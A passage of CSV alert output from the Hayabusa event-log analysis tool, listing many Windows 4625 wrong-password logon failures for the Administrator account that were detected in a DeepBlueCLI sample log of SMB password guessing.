NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: 